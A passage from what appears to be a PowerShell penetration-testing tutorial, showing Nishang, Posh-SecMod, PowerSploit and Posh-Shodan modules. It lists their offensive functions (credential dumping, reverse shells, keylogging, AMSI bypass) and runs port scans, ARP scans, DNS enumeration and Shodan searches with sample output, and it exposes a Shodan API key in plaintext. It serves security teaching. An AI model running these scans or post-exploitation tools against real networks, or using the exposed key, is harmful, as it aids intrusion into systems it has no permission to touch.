HTTP-Backdoor nishang Function Invoke-ADSBackdoor nishang Function Invoke-AmsiBypass nishang Function Invoke-BruteForce nishang Function Invoke-CredentialsPhish nishang Function Invoke-Decode nishang Function Invoke-Encode nishang Function Invoke-Interceptor nishang Function Invoke-JSRatRegsvr nishang Function Invoke-JSRatRundll nishang Function Invoke-Mimikatz nishang Function Invoke-MimikatzWDigestDowngrade nishang Function Invoke-Mimikittenz nishang Function Invoke-NetworkRelay nishang Function Invoke-PortScan nishang Function Invoke-PoshRatHttp nishang Function Invoke-PoshRatHttps nishang Function Invoke-PowerShellIcmp nishang Function Invoke-PowerShellTcp nishang Function Invoke-PowerShellUdp nishang Function Invoke-PowerShellWmi nishang Function Invoke-Prasadhak nishang Function Invoke-PSGcat nishang Function Invoke-PsGcatAgent nishang Function Invoke-PsUACme nishang Function Invoke-SSIDExfil nishang Function Out-CHM nishang Function Out-DnsTxt nishang Function Out-Excel nishang Function Out-HTA nishang Function Out-Java nishang Function Out-JS nishang Function Out-RundllCommand nishang Function Out-SCF nishang Function Out-SCT nishang Function Out-Shortcut nishang Function Out-WebQuery nishang Function Out-Word nishang Function Parse_Keys nishang Function Remove-Persistence nishang Function Remove-PoshRat nishang Function Remove-Update nishang Function Run-EXEonRemote nishang Function Show-TargetScreen nishang Function Speak nishang Function Start-CaptureServer nishang Function StringtoBase64 nishang Function TexttoEXE nishang PS C:\Users\Administrator\Desktop\nishang-master> ``` - ```Port Scan``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Get-Help Invoke-PortScan -Examples NAME Invoke-PortScan SYNOPSIS Nihsang payload which Scan IP-Addresses, Ports and HostNames -------------------------- EXAMPLE 1 -------------------------- PS >Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -------------------------- EXAMPLE 2 -------------------------- PS >Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -------------------------- EXAMPLE 3 -------------------------- PS >Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort Use above to do a port scan on default ports. -------------------------- EXAMPLE 4 -------------------------- PS >Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort -TimeOut 500 -------------------------- EXAMPLE 5 -------------------------- PS >Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.10.254 -ResolveHost -ScanPort -Port 80 PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Invoke-PortScan -StartAddress 10.0.0.1 -EndAddress 10.0.0.255 -ResolveHost IPAddress HostName Ports --------- -------- ----- 10.0.0.1 10.0.0.95 MACBOOKPRO-5ED1 10.0.0.129 John-PC.pfpt.com 10.0.0.233 WIN-2012-DC.pfpt.com 10.0.0.254 WIN-2012-DC.pfpt.com PS C:\Users\Administrator\Desktop\nishang-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Invoke-PortScan -StartAddress 10.0.0.1 -EndAddress 10.0.0.255 -ResolveHost -ScanPort IPAddress HostName Ports --------- -------- ----- 10.0.0.1 {53, 80, 443} 10.0.0.95 MACBOOKPRO-5ED1 {} 10.0.0.129 John-PC.pfpt.com {139, 445, 3389} 10.0.0.233 WIN-2012-DC.pfpt.com {53, 139, 389, 445...} 10.0.0.254 WIN-2012-DC.pfpt.com {111} PS C:\Users\Administrator\Desktop\nishang-master> ``` ###### [Posh-SecMod](https://github.com/darkoperator/Posh-SecMod) - PowerShell Module with Security cmdlets for security work - Import ```Posh-SecMod``` ```PowerShell PS C:\Users\Administrator> cd .\Desktop PS C:\Users\Administrator\Desktop> cd .\Posh-SecMod-master ``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-SecMod-master> Import-Module .\Posh-SecMod.psd1 ``` - List the ```commands``` exported by the module ```PowerShell PS C:\Users\Administrator\Desktop\Posh-SecMod-master> Get-Command -Module Posh-SecMod CommandType Name ModuleName ----------- ---- ---------- Function Add-Zip Posh-SecMod Function Compress-PostScript Posh-SecMod Function Confirm-IsAdmin Posh-SecMod Function Connect-DBSQLite3 Posh-SecMod Function ConvertTo-InAddrARPA Posh-SecMod Function ConvertTo-PostBase64Command Posh-SecMod Function ConvertTo-PostFiletoHex Posh-SecMod Function ConvertTo-PostHextoFile Posh-SecMod Function Expand-Zip Posh-SecMod Function Get-ApplicationHost Posh-SecMod Function Get-AuditDSComputerAccount Posh-SecMod Function Get-AuditDSDeletedAccount Posh-SecMod Function Get-AuditDSDisabledUserAcount Posh-SecMod Function Get-AuditDSLockedUserAcount Posh-SecMod Function Get-AuditDSUserAcount Posh-SecMod Function Get-AuditFileTimeStamp Posh-SecMod Function Get-AuditInstallSoftware Posh-SecMod Function Get-AuditLogedOnSessions Posh-SecMod Function Get-AuditPrefechList Posh-SecMod Function Get-AuditRegKeyLastWriteTime Posh-SecMod Function Get-ComObject Posh-SecMod Function Get-DBSQLite3Connection Posh-SecMod Function Get-FileHash Posh-SecMod Function Get-LogDateString Posh-SecMod Function Get-MDNSRecords Posh-SecMod Function Get-PoshSecModVersion Posh-SecMod Function Get-PostCopyNTDS Posh-SecMod Function Get-PostHashdumpScript Posh-SecMod Function Get-PostReverTCPShell Posh-SecMod Function Get-RegKeys Posh-SecMod Function Get-RegKeySecurityDescriptor Posh-SecMod Function Get-RegValue Posh-SecMod Function Get-RegValues Posh-SecMod Function Get-SystemDNSServer Posh-SecMod Function Get-Webconfig Posh-SecMod Function Get-WebFile Posh-SecMod Function Get-Whois Posh-SecMod Function Get-Zip Posh-SecMod Function Get-ZipChildItems_Recurse Posh-SecMod Function Import-DNSReconXML Posh-SecMod Function Import-NmapXML Posh-SecMod Function Invoke-ARPScan Posh-SecMod Function Invoke-DBSQLite3Query Posh-SecMod Function Invoke-EnumSRVRecords Posh-SecMod Function Invoke-PingScan Posh-SecMod Function Invoke-PortScan Posh-SecMod Function Invoke-ReverseDNSLookup Posh-SecMod Function New-DBSQLConnectionString Posh-SecMod Function New-IPRange Posh-SecMod Function New-IPv4Range Posh-SecMod Function New-IPv4RangeFromCIDR Posh-SecMod Function New-PostDownloadExecutePE Posh-SecMod Function New-PostDownloadExecuteScript Posh-SecMod Function New-RegKey Posh-SecMod Function New-Zip Posh-SecMod Function Remove-DBSQLite3Connection Posh-SecMod Function Remove-RegKey Posh-SecMod Function Remove-RegValue Posh-SecMod Function Resolve-DNSRecord Posh-SecMod Function Resolve-HostRecord Posh-SecMod Function Set-RegValue Posh-SecMod Function Start-PostRemoteProcess Posh-SecMod Function Test-RegKeyAccess Posh-SecMod Function Update-SysinternalsTools Posh-SecMod PS C:\Users\Administrator\Desktop\Posh-SecMod-master> ``` - Host Discovery - ```ARP Scan``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-SecMod-master> Get-Help Invoke-ARPScan -Examples NAME Invoke-ARPScan SYNOPSIS Performs an ARP scan against a given range of IPv4 IP Addresses. -------------------------- EXAMPLE 1 -------------------------- C:\PS>Invoke an ARP Scan against a range of IPs specified in CIDR Format PS C:\> Invoke-ARPScan -CIDR 172.20.10.1/24 MAC Address --- ------- 14:10:9F:D5:1A:BF 172.20.10.2 00:0C:29:93:10:B5 172.20.10.3 00:0C:29:93:10:B5 172.20.10.15 PS C:\Users\Administrator\Desktop\Posh-SecMod-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-SecMod-master> Invoke-ARPScan -CIDR 10.0.0.1/24 MAC Address --- ------- BC:9F:EF:69:35:19 10.0.0.19 40:F0:2F:57:6C:13 10.0.0.53 00:9A:CD:C9:77:54 10.0.0.61 08:00:27:CA:01:8E 10.0.0.94 F4:0F:24:33:5E:D1 10.0.0.95 C8:21:58:31:F6:73 10.0.0.173 08:00:27:7C:C3:C9 10.0.0.233 E4:A7:A0:09:3A:12 10.0.0.234 00:05:04:03:02:01 10.0.0.254 PS C:\Users\Administrator\Desktop\Posh-SecMod-master> ``` - Enumerate ```DNS SRV Records``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-SecMod-master> Get-Help Invoke-EnumSRVRecords -Examples NAME Invoke-EnumSRVRecords SYNOPSIS Enumerates common DNS SRV Records for a given domain. -------------------------- EXAMPLE 1 -------------------------- PS C:\>Invoke-EnumSRVRecords -Domain microsoft.com Type : SRV Name : _sip._tls.microsoft.com Port : 443 Priority : 0 Target : sip.microsoft.com. Address : @{Name=sip.microsoft.com; Type=A; Address=65.55.30.130} Type : SRV Name : _sipfederationtls._tcp.microsoft.com Port : 5061 Priority : 0 Target : sipfed.microsoft.com. Address : @{Name=sipfed.microsoft.com; Type=A; Address=65.55.30.130} Type : SRV Name : _xmpp-server._tcp.microsoft.com Port : 5269 Priority : 0 Target : sipdog3.microsoft.com. Address : @{Name=sipdog3.microsoft.com; Type=A; Address=131.107.1.47} PS C:\Users\Administrator\Desktop\Posh-SecMod-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-SecMod-master> Invoke-EnumSRVRecords -Domain google.com Type : SRV Name : _ldap._tcp.google.com Port : 389 Priority : 0 Target : ldap.google.com. Address : @{Name=ldap.google.com; Type=A; Address=216.239.32.58} Type : SRV Name : _jabber._tcp.google.com Port : 5269 Priority : 0 Target : alt2.xmpp-server.l.google.com. Address : @{Name=alt2.xmpp-server.l.google.com; Type=A; Address=173.194.219.125} Type : SRV Name : _jabber._tcp.google.com Port : 5269 Priority : 0 Target : alt1.xmpp-server.l.google.com. Address : @{Name=alt1.xmpp-server.l.google.com; Type=A; Address=64.233.181.125} Type : SRV Name : _jabber._tcp.google.com Port : 5269 Priority : 0 Target : alt3.xmpp-server.l.google.com. Address : @{Name=alt3.xmpp-server.l.google.com; Type=A; Address=74.125.192.125} Type : SRV Name : _jabber._tcp.google.com Port : 5269 Priority : 0 Target : alt4.xmpp-server.l.google.com. Address : @{Name=alt4.xmpp-server.l.google.com; Type=A; Address=173.194.214.125} Type : SRV Name : _jabber._tcp.google.com Port : 5269 Priority : 0 Target : xmpp-server.l.google.com. Address : @{Name=xmpp-server.l.google.com; Type=A; Address=74.125.135.125} Type : SRV Name : _xmpp-server._tcp.google.com Port : 5269 Priority : 0 Target : xmpp-server.l.google.com. Address : @{Name=xmpp-server.l.google.com; Type=A; Address=74.125.135.125} Type : SRV Name : _xmpp-server._tcp.google.com Port : 5269 Priority : 0 Target : alt2.xmpp-server.l.google.com. Address : @{Name=alt2.xmpp-server.l.google.com; Type=A; Address=173.194.219.125} Type : SRV Name : _xmpp-server._tcp.google.com Port : 5269 Priority : 0 Target : alt4.xmpp-server.l.google.com. Address : @{Name=alt4.xmpp-server.l.google.com; Type=A; Address=173.194.214.125} Type : SRV Name : _xmpp-server._tcp.google.com Port : 5269 Priority : 0 Target : alt3.xmpp-server.l.google.com. Address : @{Name=alt3.xmpp-server.l.google.com; Type=A; Address=74.125.192.125} Type : SRV Name : _xmpp-server._tcp.google.com Port : 5269 Priority : 0 Target : alt1.xmpp-server.l.google.com. Address : @{Name=alt1.xmpp-server.l.google.com; Type=A; Address=64.233.181.125} Type : SRV Name : _xmpp-client._tcp.google.com Port : 5222 Priority : 0 Target : alt1.xmpp.l.google.com. Address : {@{Name=alt1.xmpp.l.google.com; Type=A; Address=64.233.181.125}, @{Name=alt1.xmpp.l.google.com; Type=AAAA; Address=2607:f8b0:4001:c09::7d}} Type : SRV Name : _xmpp-client._tcp.google.com Port : 5222 Priority : 0 Target : xmpp.l.google.com. Address : {@{Name=xmpp.l.google.com; Type=A; Address=74.125.135.125}, @{Name=xmpp.l.google.com; Type=AAAA; Address=2607:f8b0:400e:c01::7d}} Type : SRV Name : _xmpp-client._tcp.google.com Port : 5222 Priority : 0 Target : alt3.xmpp.l.google.com. Address : {@{Name=alt3.xmpp.l.google.com; Type=A; Address=74.125.192.125}, @{Name=alt3.xmpp.l.google.com; Type=AAAA; Address=2607:f8b0:400d:c00::7d}} Type : SRV Name : _xmpp-client._tcp.google.com Port : 5222 Priority : 0 Target : alt4.xmpp.l.google.com. Address : {@{Name=alt4.xmpp.l.google.com; Type=A; Address=173.194.214.125}, @{Name=alt4.xmpp.l.google.com; Type=AAAA; Address=2607:f8b0:400c:c0b::7d}} Type : SRV Name : _xmpp-client._tcp.google.com Port : 5222 Priority : 0 Target : alt2.xmpp.l.google.com. Address : {@{Name=alt2.xmpp.l.google.com; Type=A; Address=173.194.219.125}, @{Name=alt2.xmpp.l.google.com; Type=AAAA; Address=2607:f8b0:4002:c03::7d}} Type : SRV Name : _jabber-client._tcp.google.com Port : 5222 Priority : 0 Target : xmpp.l.google.com. Address : {@{Name=xmpp.l.google.com; Type=A; Address=74.125.135.125}, @{Name=xmpp.l.google.com; Type=AAAA; Address=2607:f8b0:400e:c01::7d}} Type : SRV Name : _jabber-client._tcp.google.com Port : 5222 Priority : 0 Target : alt1.xmpp.l.google.com. Address : {@{Name=alt1.xmpp.l.google.com; Type=A; Address=64.233.181.125}, @{Name=alt1.xmpp.l.google.com; Type=AAAA; Address=2607:f8b0:4001:c09::7d}} Type : SRV Name : _jabber-client._tcp.google.com Port : 5222 Priority : 0 Target : alt4.xmpp.l.google.com. Address : {@{Name=alt4.xmpp.l.google.com; Type=A; Address=173.194.214.125}, @{Name=alt4.xmpp.l.google.com; Type=AAAA; Address=2607:f8b0:400c:c0b::7d}} Type : SRV Name : _jabber-client._tcp.google.com Port : 5222 Priority : 0 Target : alt2.xmpp.l.google.com. Address : {@{Name=alt2.xmpp.l.google.com; Type=A; Address=173.194.219.125}, @{Name=alt2.xmpp.l.google.com; Type=AAAA; Address=2607:f8b0:4002:c03::7d}} Type : SRV Name : _jabber-client._tcp.google.com Port : 5222 Priority : 0 Target : alt3.xmpp.l.google.com. Address : {@{Name=alt3.xmpp.l.google.com; Type=A; Address=74.125.192.125}, @{Name=alt3.xmpp.l.google.com; Type=AAAA; Address=2607:f8b0:400d:c00::7d}} PS C:\Users\Administrator\Desktop\Posh-SecMod-master> ``` ###### [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) - A PowerShell Post-Exploitation Framework - Import ```PowerSploit``` ```PowerShell PS C:\Users\Administrator> cd .\Desktop\PowerSploit-master ``` ```PowerShell PS C:\Users\Administrator\Desktop\PowerSploit-master> Import-Module .\PowerSploit.psd1 ``` - List the ```commands``` exported by the module ```PowerShell PS C:\Users\Administrator\Desktop\PowerSploit-master> Get-Command -Module PowerSploit CommandType Name ModuleName ----------- ---- ---------- Function Add-NetUser PowerSploit Function Add-ObjectAcl PowerSploit Function Add-Persistence PowerSploit Function Add-ServiceDacl PowerSploit Function Find-AVSignature PowerSploit Function Find-ComputerField PowerSploit Function Find-ForeignGroup PowerSploit Function Find-ForeignUser PowerSploit Function Find-GPOComputerAdmin PowerSploit Function Find-GPOLocation PowerSploit Function Find-InterestingFile PowerSploit Function Find-LocalAdminAccess PowerSploit Function Find-ManagedSecurityGroups PowerSploit Function Find-PathDLLHijack PowerSploit Function Find-ProcessDLLHijack PowerSploit Function Get-ADObject PowerSploit Function Get-ApplicationHost PowerSploit Function Get-ComputerDetails PowerSploit Function Get-ComputerProperty PowerSploit Function Get-CurrentUserTokenGroupSid PowerSploit Function Get-DFSshare PowerSploit Function Get-DomainPolicy PowerSploit Function Get-ExploitableSystem PowerSploit Function Get-GPPPassword PowerSploit Function Get-HttpStatus PowerSploit Function Get-Keystrokes PowerSploit Function Get-ModifiablePath PowerSploit Function Get-ModifiableRegistryAutoRun PowerSploit Function Get-ModifiableScheduledTaskFile PowerSploit Function Get-ModifiableService PowerSploit Function Get-ModifiableServiceFile PowerSploit Function Get-NetComputer PowerSploit Function Get-NetDomainTrust PowerSploit Function Get-NetFileServer PowerSploit Function Get-NetForestTrust PowerSploit Function Get-NetGPO PowerSploit Function Get-NetGPOGroup PowerSploit Function Get-NetGroup PowerSploit Function Get-NetGroupMember PowerSploit Function Get-NetLocalGroup PowerSploit Function Get-NetOU PowerSploit Function Get-NetSite PowerSploit Function Get-NetSubnet PowerSploit Function Get-NetUser PowerSploit Function Get-ObjectAcl PowerSploit Function Get-PathAcl PowerSploit Function Get-RegistryAlwaysInstallElevated PowerSploit Function Get-RegistryAutoLogon PowerSploit Function Get-SecurityPackages PowerSploit Function Get-ServiceDetail PowerSploit Function Get-ServiceUnquoted PowerSploit Function Get-SiteListPassword PowerSploit Function Get-System PowerSploit Function Get-TimedScreenshot PowerSploit Function Get-UnattendedInstallFile PowerSploit Function Get-UserProperty PowerSploit Function Get-VaultCredential PowerSploit Function Get-VolumeShadowCopy PowerSploit Function Get-WebConfig PowerSploit Function Install-ServiceBinary PowerSploit Function Install-SSP PowerSploit Function Invoke-ACLScanner PowerSploit Function Invoke-AllChecks PowerSploit Function Invoke-CredentialInjection PowerSploit Function Invoke-DllInjection PowerSploit Function Invoke-EnumerateLocalAdmin PowerSploit Function Invoke-EventHunter PowerSploit Function Invoke-FileFinder PowerSploit Function Invoke-MapDomainTrust PowerSploit Function Invoke-Mimikatz PowerSploit Function Invoke-NinjaCopy PowerSploit Function Invoke-Portscan PowerSploit Function Invoke-ProcessHunter PowerSploit Function Invoke-ReflectivePEInjection PowerSploit Function Invoke-ReverseDnsLookup PowerSploit Function Invoke-ServiceAbuse PowerSploit Function Invoke-ShareFinder PowerSploit Function Invoke-Shellcode PowerSploit Function Invoke-TokenManipulation PowerSploit Function Invoke-UserHunter PowerSploit Function Invoke-WmiCommand PowerSploit Function Mount-VolumeShadowCopy PowerSploit Function New-ElevatedPersistenceOption PowerSploit Function New-UserPersistenceOption PowerSploit Function New-VolumeShadowCopy PowerSploit Function Out-CompressedDll PowerSploit Function Out-EncodedCommand PowerSploit Function Out-EncryptedScript PowerSploit Function Out-Minidump PowerSploit Function Remove-Comments PowerSploit Function Remove-VolumeShadowCopy PowerSploit Function Restore-ServiceBinary PowerSploit Function Set-ADObject PowerSploit Function Set-CriticalProcess PowerSploit Function Set-MasterBootRecord PowerSploit Function Set-ServiceBinPath PowerSploit Function Test-ServiceDaclPermission PowerSploit Function Write-HijackDll PowerSploit Function Write-ServiceBinary PowerSploit Function Write-UserAddMSI PowerSploit Filter Convert-NameToSid PowerSploit Filter Convert-SidToName PowerSploit Filter Find-UserField PowerSploit Filter Get-CachedRDPConnection PowerSploit Filter Get-LastLoggedOn PowerSploit Filter Get-NetDomain PowerSploit Filter Get-NetDomainController PowerSploit Filter Get-NetForest PowerSploit Filter Get-NetForestCatalog PowerSploit Filter Get-NetForestDomain PowerSploit Filter Get-NetLoggedon PowerSploit Filter Get-NetProcess PowerSploit Filter Get-NetRDPSession PowerSploit Filter Get-NetSession PowerSploit Filter Get-NetShare PowerSploit Filter Get-Proxy PowerSploit Filter Get-UserEvent PowerSploit Filter Invoke-CheckLocalAdminAccess PowerSploit PS C:\Users\Administrator\Desktop\PowerSploit-master> ``` - ```Port Scan``` ```PowerShell PS C:\Users\Administrator\Desktop\PowerSploit-master> Get-Help Invoke-Portscan -Examples NAME Invoke-Portscan SYNOPSIS Simple portscan module PowerSploit Function: Invoke-Portscan Author: Rich Lundeen (http://webstersProdigy.net) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None -------------------------- EXAMPLE 1 -------------------------- C:\PS>Invoke-Portscan -Hosts "webstersprodigy.net,google.com,microsoft.com" -TopPorts 50 Description ----------- Scans the top 50 ports for hosts found for webstersprodigy.net,google.com, and microsoft.com -------------------------- EXAMPLE 2 -------------------------- C:\PS>echo webstersprodigy.net | Invoke-Portscan -oG test.gnmap -f -ports "80,443,8080" Description ----------- Does a portscan of "webstersprodigy.net", and writes a greppable output file -------------------------- EXAMPLE 3 -------------------------- C:\PS>Invoke-Portscan -Hosts 192.168.1.1/24 -T 4 -TopPorts 25 -oA localnet Description ----------- Scans the top 20 ports for hosts found in the 192.168.1.1/24 range, outputs all file formats PS C:\Users\Administrator\Desktop\PowerSploit-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\PowerSploit-master> Invoke-Portscan -Hosts "google.com" Hostname : google.com alive : True openPorts : {80, 443} closedPorts : {} filteredPorts : {79, 88, 2049, 8081...} finishTime : 7/9/2017 6:05:12 PM PS C:\Users\Administrator\Desktop\PowerSploit-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\PowerSploit-master> $result = Invoke-Portscan -Hosts "google.com" ``` ```PowerShell PS C:\Users\Administrator\Desktop\PowerSploit-master> $result | Select-Object -ExpandProperty FilteredPorts 5900 993 995 111 1723 22 8080 3306 135 53 143 139 445 110 3389 21 23 32768 8000 8443 2000 1026 179 6001 81 113 548 1720 1025 79 88 2049 8081 49153 631 5631 5000 646 5666 1027 49154 8008 515 2001 49152 1433 26 554 PS C:\Users\Administrator\Desktop\PowerSploit-master> ``` ================================================ FILE: 41-Recon-and-Scanning-Part-2.md ================================================ #### 41. Recon and Scanning Part 2 ###### [Posh-Shodan](https://github.com/darkoperator/Posh-Shodan) - Import [```Posh-Shodan```](http://www.powershellmagazine.com/2014/07/15/posh-shodan-module-for-the-shodan-service/) ```PowerShell PS C:\Users\Administrator> cd .\Desktop\Posh-Shodan-master ``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-Shodan-master> Import-Module .\Posh-Shodan.psd1 ``` - List the ```commands``` exported by the module ```PowerShell PS C:\Users\Administrator\Desktop\Posh-Shodan-master> Get-Command -Module Posh-Shodan CommandType Name ModuleName ----------- ---- ---------- Function Get-ShodanAPIInfo Posh-Shodan Function Get-ShodanDNSResolve Posh-Shodan Function Get-ShodanDNSReverse Posh-Shodan Function Get-ShodanHostService Posh-Shodan Function Get-ShodanMyIP Posh-Shodan Function Get-ShodanService Posh-Shodan Function Measure-ShodanExploit Posh-Shodan Function Measure-ShodanHost Posh-Shodan Function Read-ShodanAPIKey Posh-Shodan Function Search-ShodanExploit Posh-Shodan Function Search-ShodanHost Posh-Shodan Function Set-ShodanAPIKey Posh-Shodan PS C:\Users\Administrator\Desktop\Posh-Shodan-master> ``` - List ```help``` topics for ```Shodan``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-Shodan-master> help *shodan* Name Category Module Synopsis ---- -------- ------ -------- Get-ShodanAPIInfo Function Posh-Shodan Get features and information for a given API Key. Get-ShodanDNSResolve Function Posh-Shodan Look up the IP address for the provided list of hostnames. Get-ShodanDNSReverse Function Posh-Shodan Look up the hostnames that have been defined for the given list of IP addresses. Get-ShodanHostService Function Posh-Shodan Get-ShodanMyIP Function Posh-Shodan Get your current IP address as seen from the Internet. Get-ShodanService Function Posh-Shodan Measure-ShodanExploit Function Posh-Shodan Search across a variety of data sources for exploits and get summary information using Shodan. Measure-ShodanHost Function Posh-Shodan Returns the total number of results that matched the query and any facet information that was requested. Read-ShodanAPIKey Function Posh-Shodan Read from disk the saved Shodan API Key Search-ShodanExploit Function Posh-Shodan Search across a variety of data sources for exploits. using Shodan Search-ShodanHost Function Posh-Shodan Search Shodan using the same query syntax as the website and use facets to get summary information for different properties. Set-ShodanAPIKey Function Posh-Shodan Set a default Shodan API key for use by Posh-Shodan module. about_Shodan_Host_Search_Facets HelpFile Describes the search facets that can be used when performing a search for about_Shodan_Host_Search_Filters HelpFile Describes the search filters that can be used when performing a search for PS C:\Users\Administrator\Desktop\Posh-Shodan-master> ``` - Set the [```Shodan API Key```](https://account.shodan.io/) ```PowerShell PS C:\Users\Administrator\Desktop\Posh-Shodan-master> Set-ShodanAPIKey -APIKey Y2DmqAThPzLFP1b1Ubanif3YGaqsoQlx cmdlet Set-ShodanAPIKey at command pipeline position 1 Supply values for the following parameters: MasterPassword: **** PS C:\Users\Administrator\Desktop\Posh-Shodan-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-Shodan-master> Read-ShodanAPIKey cmdlet Read-ShodanAPIKey at command pipeline position 1 Supply values for the following parameters: MasterPassword: **** PS C:\Users\Administrator\Desktop\Posh-Shodan-master> ``` - ```Shodan API Info``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-Shodan-master> Get-ShodanAPIInfo Unlocked_Left : 0 Telnet : False Plan : oss HTTPS : False Unlocked : False PS C:\Users\Administrator\Desktop\Posh-Shodan-master> ``` - ```Shodan DNS Resolution``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-Shodan-master> Get-ShodanDNSResolve -Hostname google.com google.com ---------- 216.58.194.174 PS C:\Users\Administrator\Desktop\Posh-Shodan-master> ``` - ```Measure all Shodan Hosts``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-Shodan-master> Measure-ShodanHost -Query "default password" Total : 80630 Facets : PS C:\Users\Administrator\Desktop\Posh-Shodan-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-Shodan-master> Measure-ShodanHost -Query "RDP" Total : 947 Facets : PS C:\Users\Administrator\Desktop\Posh-Shodan-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-Shodan-master> Measure-ShodanHost -Query "phpmyadmin" Total : 36173 Facets : PS C:\Users\Administrator\Desktop\Posh-Shodan-master> ``` - List all ```Shodan services``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-Shodan-master> Get-ShodanService 623 : IPMI 626 : serialnumbered 5985 : WinRM 2.0 2455 : Codesys 5560 : Oracle HTTP 8098 : Riak Web Interface 9000 : NAS Web Interfaces 7071 : Zimbra HTTP 62078 : iPhone 137 : NetBIOS 3000 : ntop 67 : DHCP 8090 : Insteon Hub 2087 : WHM + SSL 9151 : Tor control port 1900 : UPnP 9200 : ElasticSearch 2323 : Telnet (2323) 25 : SMTP 3128 : Squid Proxy 5353 : mDNS 21 : FTP 22 : SSH 23 : Telnet 44818 : EtherNetIP 10000 : Webmin 4949 : Munin 3790 : Metasploit 3388 : RDP (3388) 8139 : Puppet Agent 2404 : IEC-104 1723 : PPTP 2152 : GPRS Tunneling Protocol 8089 : Splunk 502 : Modbus 5986 : WinRM 2.0 + SSL 500 : IKE 995 : POP3 + SSL 631 : CUPS 5060 : SIP 993 : IMAP + SSL 992 : Telnet + SSL 465 : SMTP + SSL 8140 : Puppet Master 2628 : Dictionary 18245 : General Electric SRTP 2123 : GPRS Tunneling Protocol 32764 : Router backdoor 8333 : Bitcoin 123 : NTP 20000 : DNP3 1911 : Tridium Fox 129 : Password generator protocol 161 : SNMP 9981 : HTS/ tvheadend 11 : Systat 9999 : Telnet (Lantronix) 13 : Daytime 15 : Netstat 1023 : Telnet (1023) 17 : Quote of the day 20547 : ProConOS 19 : Character Generator 5222 : XMPP 4443 : Symantec Data Center Security 16010 : Hbase 8181 : HTTP (8181) 53 : DNS 6666 : Voldemort 5901 : VNC (5901) 9944 : Pipeline Pilot 4022 : Udpxy 28017 : MongoDB Web Interface 2067 : DLSW 64738 : Mumble server 5007 : Mitsubishi MELSEC-Q 10001 : Automated Tank Gauge 9600 : OMRON FINS 2086 : WHM 7657 : HTTP (7657) 4369 : Erlang Port Mapper Daemon 1200 : Codesys 9100 : Printer Job Language 1604 : Citrix 9051 : Tor control port 3306 : MySQL 88 : Kerberos 111 : Portmap 110 : POP3 25565 : Minecraft 8443 : HTTPS (8443) 82 : HTTP (82) 83 : HTTP (83) 80 : HTTP 81 : HTTP (81) 119 : NNTP 84 : HTTP (84) 5006 : Mitsubishi MELSEC-Q 3386 : GPRS Tunneling Protocol 8888 : AndroMouse 4040 : Chef 9943 : Pipeline Pilot + SSL 9160 : Cassandra 8069 : OpenERP 5094 : HART-IP 3479 : 2-Wire RPC 1962 : PCWorx 3389 : RDP 7777 : Oracle 5432 : PostgreSQL 18246 : General Electric SRTP 7 : Echo 523 : IBM DB2 50100 : Telnet 49152 : Supermicro Web Interface 1234 : Udpxy 3780 : Nexpose 5001 : Synology 5000 : Synology 771 : RealPort 143 : IMAP 443 : HTTPS 55553 : Metasploit (55553) 5008 : NetMobility 5357 : Microsoft-HTTPAPI/2.0 55554 : Metasploit (55554) 445 : SMB 11211 : MemCache 4500 : IKE-NAT-T 8129 : Snapstream 8834 : Nessus 102 : Siemens S7 389 : LDAP 8000 : Qconn 79 : Finger 47808 : BACnet 1434 : MS-SQL Monitor 8087 : Riak Protobuf 8080 : HTTP (8080) 6000 : X Windows 2082 : cPanel 2083 : cPanel + SSL 27017 : MongoDB 6001 : X Windows (6001) 37 : rdate 789 : Red Lion 5632 : PC Anywhere 4911 : Tridium Fox + SSL 6379 : Redis 1471 : Hak5 Pineapple 2375 : Docker 2376 : Docker + SSL 515 : Line Printer Daemon 5900 : VNC 10243 : Microsoft-HTTPAPI/2.0 7547 : Modem Web Interface PS C:\Users\Administrator\Desktop\Posh-Shodan-master> ``` ###### [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) - Import ```PowerSploit``` ```PowerShell PS C:\Users\Administrator> cd .\Desktop\PowerSploit-master ``` ```PowerShell PS C:\Users\Administrator\Desktop\PowerSploit-master> Import-Module .\PowerSploit.psd1 ``` - File and Directory enumeration on web servers. (```Get-HttpStatus```) ```PowerShell PS C:\Users\Administrator\Desktop\PowerSploit-master> Get-Help Get-HttpStatus NAME Get-HttpStatus SYNOPSIS Returns the HTTP Status Codes and full URL for specified paths. PowerSploit Function: Get-HttpStatus Author: Chris Campbell (@obscuresec) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None SYNTAX Get-HttpStatus [-Target] [[-Path] ] [[-Port] ] [-UseSSL] [] DESCRIPTION A script to check for the existence of a path or file on a webserver. RELATED LINKS http://obscuresecurity.blogspot.com http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html REMARKS To see the examples, type: "get-help Get-HttpStatus -examples". For more information, type: "get-help Get-HttpStatus -detailed". For technical information, type: "get-help Get-HttpStatus -full". For online help, type: "get-help Get-HttpStatus -online" PS C:\Users\Administrator\Desktop\PowerSploit-master> ``` ```PowerShell PS 